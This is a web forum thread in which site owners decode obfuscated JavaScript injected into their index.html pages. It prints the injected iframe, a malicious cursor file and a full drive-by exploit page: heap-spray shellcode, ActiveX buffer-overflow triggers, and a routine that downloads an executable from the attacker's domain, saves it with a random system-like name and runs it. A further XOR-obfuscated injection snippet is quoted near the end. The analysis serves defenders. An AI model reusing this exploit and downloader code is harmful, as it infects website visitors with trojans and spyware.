What is this malicious injected code all about?
 

I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code?


this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen:

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>

Unescape() and escape() can be used to encode/decode parts of a script or URL or so on.

It looks to me initially that it is trying to send some data to the hacker via e-mail.

In your case its:

document.write('<iframe src=http://softspydelete.com/strong /050/ width=1 heght=1></iframe>');

Fun with hex.
 

Your code converts to this:

<script>eval(unescape(document.write('<iframe src=http://softspydelete.com/strong/050/ width=1 height=1></iframe>');));</script>


.

interesting, thanks for the replies

it's on a shared account

is there anything I should do as a user to protect against it? (permissions or something?) ...or is it something that the server admin should be taking care of?

what could a hacker possibly be hoping to achieve by injecting that in many index files (I noticed the same code in other accounts on the same server)

interesting too, the whois for that domain shows a Russian owner with a Turkish IP

http://softspydelete.com/strong/050/ (Points to the below)


<script>

var aTDnc='ae77613122a3db26313c68746d6c3e0a3c626f64793 e3c7374796c653e202a207b435552534f523a2075726c28223 332343132332e68746d6c22297d203c2f7374796c653e0a3c6 96672616d65207372633d2265312e68746d6c2220776964746 83d223122206865696768743d2231223e3c2f696672616d653 e3c2f626f64793e0a3c2f68746d6c3e3abe68ad57';
eval(unescape('%76%61%72%20%71%31%47%70%79%20%3d%2 0%27%27%3b%0a%76%61%72%20%4d%56%35%76%20%3d%20%61% 54%44%6e%63%2e%73%6c%69%63%65%20%28%20%31%38%2c%20 %32%37%34%20%29%3b%0a%66%6f%72%20%28%20%63%36%20%3 d%20%31%38%20%3b%20%63%36%20%3c%20%32%37%34%20%3b% 20%63%36%20%2b%3d%20%32%20%29%7b%0a%09%71%31%47%70 %79%20%2b%3d%20%27%25%27%20%2b%20%61%54%44%6e%63%2 e%73%6c%69%63%65%20%28%20%63%36%2c%20%63%36%20%2b% 20%32%20%29%3b%0a%7d%64%6f%63%75%6d%65%6e%74%2e%77 %72%69%74%65%28%75%6e%65%73%63%61%70%65%28%71%31%4 7%70%79%29%29%3b'));</script>



( below is how it breaks down )

--------------



var aTDnc='®wa1"£Û&1<html><body><style> * {CURSOR: url("324123.html")} </style><iframe src="e1.html" width="1" height="1"></iframe></body></html>:¾hhaW'

eval(unescape('var q1Gpy = ''; var MV5v = aTDnc.slice ( 18, 274 ); for ( c6 = 18 ; c6 < 274 ; c6 += 2 ){q1Gpy += '%' + aTDnc.slice ( c6, c6 + 2 );}document.write(unescape(q1Gpy));�'));</script>


-----

Now ( 324123.html )


RIFF���ACONanih$���$���ÿÿ��
����������������������
���TSIL������TSIL��� anih¨�� ¢@� 1Éf�Á8ë^ëèøÿÿÿ?Æ ?.Fâúê_?ï/Bê?�?+Bêwtnoqp0fnnêä?Å�?KBêWTN FqypnqcfVqHkngCUê¾��LBllêe<^dqqv0kpzS l
Ò�?8Blêe<^dqqv0kpzê?�?@Blês  Nqc fNkdtct{CYkpGzgeGzkvRtqeguujvvr<1142;03820940:2 1921PQVGRCF0GZG b ê_?ïÉBf�2�]�]��]
?Ü??ZB�}>Ùaz�M�u"�}&ØÙþ¯ÒSY?�¿KB»õ¨? a[vIIäæíÆ3Âh� Ãâ�uØȯÒ??^BcÅR
·ZB
?^B
âIgvRtqeCff tguuüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü ü



------


And ( e1.html )



<html>
<body><div id="mydiv"></div><Script Language='JavaScript'>
var mm = new Array();
var mem_flag = 0;

function h() {mm=mm; setTimeout("h()", 2000);}

function getb(b, bSize)
{while (b.length*2<bSize){b += b;}
b = b.substring(0,bSize/2);return b;}

function cf()
{var zc = 0x05050505;
var a = unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d 00%ued81%u11ca%u0040%ucbe8%u0000%u8d00%u5a85%u4012 %ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u 0000%uc389%u858d%u1319%u0040%u13e8%u0000%u5500%u4c 52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041 %ue853%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u 006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078%u6a 51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000 %u3a63%u745c%u692e%u786e%ue800%u00bd%u0000%u858d%u 126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u62 69%u6172%u7972%u0041%u6957%u456e%u6578%u0063%u7845 %u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u 6f73%u7466%u7073%u6479%u6c65%u7465%u2e65%u6f63%u2f 6d%u6c64%u302f%u3035%u772f%u6e69%u3233%u652e%u6578 %u1d00%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u 8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03%u8b 78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001 %u5751%u8d96%u19bd%u4013%ub900%u000f%u0000%ua6f3%u 5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0 c1%u8b02%u1c73%ud601%uc601%u01ad%u89d0%u2c85%u4013 %u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%u e0ff%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u00 00%u0000%u0000%u0000%u9000");
var heapBl2ckSize = 0x400000;
var pls = a.length * 2;
var bSize = heapBl2ckSize - (pls+0x38);
var b = unescape("%u0505%u0505"); b = getb(b,bSize);
heapBl2cks = (zc - 0x400000)/heapBl2ckSize;

for (i=0;i<heapBl2cks;i++)
{mm[i] = b + a;}

mem_flag = 1;
return mm;
}

function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi '+'ewFol'+'derI'+'con.1');
d = 0x7ffffffe;
b = 0x05050505
tar.setSlice(d, b, b, b );
}catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
try {
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+' ewFol'+'derI'+'con.1');
if (tar) {
if (! mem_flag) cf();
startWVF();
}
} catch(e) { }
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function AD2BDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MD2C() {
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://softspydelete.com/dl/050/win32.exe';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam");
}

if (! v[2]) {
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2]) {
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (AD2BDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MD2C() ) { startOverflow(0); }

}

start();
</script></body>
</html>

Ok, so the short version means: A trojan (installer) using activex to sneak on the system, disguised as a windows system file ?!

awesome followthrough

so anyone have any theories to what they would be trying to achieve with this?

I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)

that IFRAME is loading a page, that executes an exploit, that uploads a trojan... it's much better to redirect to a 3rd party page in case you want to update your exploit code... nasty shit, dealt with something similar a few weeks ago, had to cleanse several thousand pages :)

infecting people with spyware.

is the code hardwritten into the page ( like do you see it by ftp or only by browser )

the code made it hardwritten into my index.html files on completely separate datacenters

---------------------------------------------------------


http://softspydelete.com



softspydelete.com. NS 3600 ns2.trdns.biz.
softspydelete.com. NS 3600 ns1.trdns.biz.
softspydelete.com. A 3600 88.255.90.253




----------------

Searching for ns1.trdns.biz. A record at B.ROOT-SERVERS.NET. [192.228.79.201] ...took 156 ms
Searching for ns1.trdns.biz. A record at A.GTLD.biz. [209.173.53.162] ...took 93 ms
Searching for ns1.trdns.biz. A record at NS2.trdns.biz. [88.255.90.252] ...took 120 ms

A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251

----------------



----------------


Searching for ns1.trdns.biz. A record at E.ROOT-SERVERS.NET. [192.203.230.10] ...took 177 ms
Searching for ns1.trdns.biz. A record at H.GTLD.biz. [199.7.77.126] ...took 10 ms
Searching for ns1.trdns.biz. A record at ns1.trdns.biz. [88.255.90.251] ...took 120 ms

A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251



----------------

Perhaps a root kit as to attack others systems or perhaps spam...


.

i have been getting this code for about a month now and have only just resolved the issue with webair's help. if you simply remove the code from your index pages it comes back, did with me anyways.

i think it came from an exploit in a script was using, i have removed the script and remade all affected webpages and its fine so far, fingers crossed :thumbsup

Spudman how exactly did this code get onto webair servers to begin with ?

.

He said that he had a vulnerable script

i dunno balal, i got a dedicated box, the code got on it somehow, i think through one of the scripts i use, and i got on every index.html page i have and if i removed it, it simply came back, at first it seemed to just bring up the outlook.exe popup but then it really started fucking my pages up so i've practically deleted everything and started again.

the scripts i was running on my box were:
e107
comus
TM3
TTTv4
and some photo gallery software.

maybe through one of those,

i've checked and ammended any permissions on all my pages, also renamed all templates that come with scripts(i should have done this before anyways, just lazy :) ) and so far i seem clean again.

Perhaps someone attached a misc code to a image file?

If you run a virus scanner on your server it might be a good idea... :upsidedow

Later,

I remember a similar code infecting tonnes of sites out there. It reinfects html pages within days if cleaned.
I was under the impression that it happens because of a vulnerability with windows virtual machine but am not sure how to prevent it. Does any one know what causes this and how to fix it.....keep in mind that it propgates via internet.

<script language="JavaScript">e = '0x00' + '56';str1 = "&#37;ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4 %BE%B7%BE%BD%BE%A5%AE%EF%B1%BE%B5%B5%B2%BB%F7%EB%E D%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9% EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD %B5%F8%B0%A7%B2%AE%F8%F7%C9%A0%BE%B5%A5%B1%EA%E6%C 9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7%B6%BA% B2%EB%ED%F8%B5%BE%A3%EB";str=tmp='';for(i=0;i<str1 .length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

I had the same problem for a while it isusually inserted via a database on your own server. Secure the Data sources or remove unused ones, clear the index.html.

I worked with SplitInfinity to solve my problem hit up your host and check with them to get it flushed.

Goddamn that is sneaky.

idk, hummm i have NO idea???? good question

i think it is an iframe that injects the code and resides as a .js file on the server.